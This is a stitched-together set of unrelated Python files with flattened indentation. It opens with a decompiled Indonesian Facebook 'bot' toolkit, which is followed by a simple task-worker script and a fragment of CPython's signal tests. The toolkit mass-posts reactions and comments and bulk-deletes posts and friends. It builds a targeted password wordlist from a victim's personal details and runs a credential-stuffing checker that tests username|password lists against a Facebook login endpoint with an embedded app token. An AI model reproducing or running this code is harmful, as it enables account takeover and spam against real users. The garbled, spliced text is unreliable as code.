print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
|
worker.py
|
import socket
import json
import time
import sys
import random
import numpy as np
import threading
import logging
#intializing the logging and setting up the logger
def init_log(id,port):
filen1="Worker_"+str(id)+".log"
filen2="log_from_worker"
logging.basicConfig(filename=filen1, format='%(asctime)s,%(message)s', filemode='a')
logger=logging.getLogger(filen2)
logger.setLevel(logging.DEBUG)
#listen to master for tasks
def listen_master(port):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host=''
s.bind((host,port))
while 1:
s.listen(50) #can be increased based on tasks receiving
conn,addr=s.accept()
w_th=[]
#print('connected to this by adress',addr)
while 1:
task_exec=conn.recv(2048)
if task_exec:
task_exec=task_exec.decode()
duras=task_exec.strip().split('\n')
print("Recieved Tasks form master: ",(duras))
copy_duras=duras.copy()
pol=threading.Thread(target=pool,args=(copy_duras,port,))
w_th.append(pol)
pol.start()
else:
break
conn.close()
'''
for i in w_th:
wt=i
wt.join()
w_th.remove(i)
'''
#parsing and adding task to the pool
def pool(copy_duras,port):
dura_th=[]
logger=logging.getLogger("log_from_worker")
for dura in copy_duras:
task,dura1=dura.split(' ')
logger.info("Task_starting_of_duration: "+str(dura1))
print("Task added to pool of duration: ",dura1)
task_sch=threading.Thread(target=add_to_pool,args=(dura,port,))
dura_th.append(task_sch)
task_sch.start()
'''
for i in dura_th:
da=i
da.join()
dura_th.remove(i)
'''
#executing the task and reporting to master
def add_to_pool(dura,port):
task1,dura2=dura.split(' ')
logger=logging.getLogger("log_from_worker")
time.sleep(int(dura2))
logger.info("Task_finished_of_duration: "+str(dura2))
print("Task finished of duration: "+str(dura2))
host_to_send = '127.0.0.1'
port_to_send = 5001
workerSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
workerSocket.connect((host_to_send,port_to_send))
done=task1+' '+str(port)+'\n'
workerSocket.send(done.encode())
workerSocket.close()
if __name__=="__main__":
port=int(sys.argv[1])
id=int(sys.argv[2])
init_log(id,port)
lis_master=threading.Thread(target=listen_master,args=(port,))
lis_master.start()
lis_master.join()
|
test_signal.py
|
import enum
import errno
import inspect
import os
import random
import signal
import socket
import statistics
import subprocess
import sys
import threading
import time
import unittest
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, spawn_python
try:
import _testcapi
except ImportError:
_testcapi = None
class GenericTests(unittest.TestCase):
def test_enums(self):
for name in dir(signal):
sig = getattr(signal, name)
if name in {'SIG_DFL', 'SIG_IGN'}:
self.assertIsInstance(sig, signal.Handlers)
elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}:
self.assertIsInstance(sig, signal.Sigmasks)
elif name.startswith('SIG') and not name.startswith('SIG_'):
self.assertIsInstance(sig, signal.Signals)
elif name.startswith('CTRL_'):
self.assertIsInstance(sig, signal.Signals)
self.assertEqual(sys.platform, "win32")
CheckedSignals = enum._old_convert_(
enum.IntEnum, 'Signals', 'signal',
lambda name:
name.isupper()
and (name.startswith('SIG') and not name.startswith('SIG_'))
or name.startswith('CTRL_'),
source=signal,
)
enum._test_simple_enum(CheckedSignals, signal.Signals)
CheckedHandlers = enum._old_convert_(
enum.IntEnum, 'Handlers', 'signal',
lambda name: name in ('SIG_DFL', 'SIG_IGN'),
source=signal,
)
enum._test_simple_enum(CheckedHandlers, signal.Handlers)
Sigmasks = getattr(signal, 'Sigmasks', None)
if Sigmasks is not None:
CheckedSigmasks = enum._old_convert_(
enum.IntEnum, 'Sigmasks', 'signal',
lambda name: name in ('SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'),
source=signal,
)
enum._test_simple_enum(CheckedSigmasks, Sigmasks)
def test_functions_module_attr(self):
# Issue #27718: If __all__ is not defined all non-builtin functions
# should have correct __module__ to be displayed by pydoc.
for name in dir(signal):
value = getattr(signal, name)
if inspect.isroutine(value) and not inspect.isbuiltin(value):
self.assertEqual(value.__module__, 'signal')
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class PosixTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
self.assertRaises(ValueError, signal.strsignal, 4242)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertIsInstance(hup, signal.Handlers)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
def test_strsignal(self):
self.assertIn("Interrupt", signal.strsignal(signal.SIGINT))
self.assertIn("Terminated", signal.strsignal(signal.SIGTERM))
self.assertIn("Hangup", signal.strsignal(signal.SIGHUP))
# Issue 3864, unknown if this affects earlier versions of freebsd also
def test_interprocess_signal(self):
dirname = os.path.dirname(__file__)
script = os.path.join(dirname, 'signalinterproctester.py')
assert_python_ok(script)
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertIn(signal.Signals.SIGINT, s)
self.assertIn(signal.Signals.SIGALRM, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
@unittest.skipUnless(sys.executable, "sys.executable required.")
def test_keyboard_interrupt_exit_code(self):
"""KeyboardInterrupt triggers exit via SIGINT."""
process = subprocess.run(
[sys.executable, "-c",
"import os, signal, time\n"
"os.kill(os.getpid(), signal.SIGINT)\n"
"for _ in range(999): time.sleep(0.01)"],
stderr=subprocess.PIPE)
self.assertIn(b"KeyboardInterrupt", process.stderr)
self.assertEqual(process.returncode, -signal.SIGINT)
# Caveat: The exit code is insufficient to guarantee we actually died
# via a signal. POSIX shells do more than look at the 8 bit value.
# Writing an automation friendly test of an interactive shell
# to confirm that our process died via a SIGINT proved too complex.
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertGreaterEqual(len(s), 6)
self.assertIn(signal.Signals.SIGINT, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
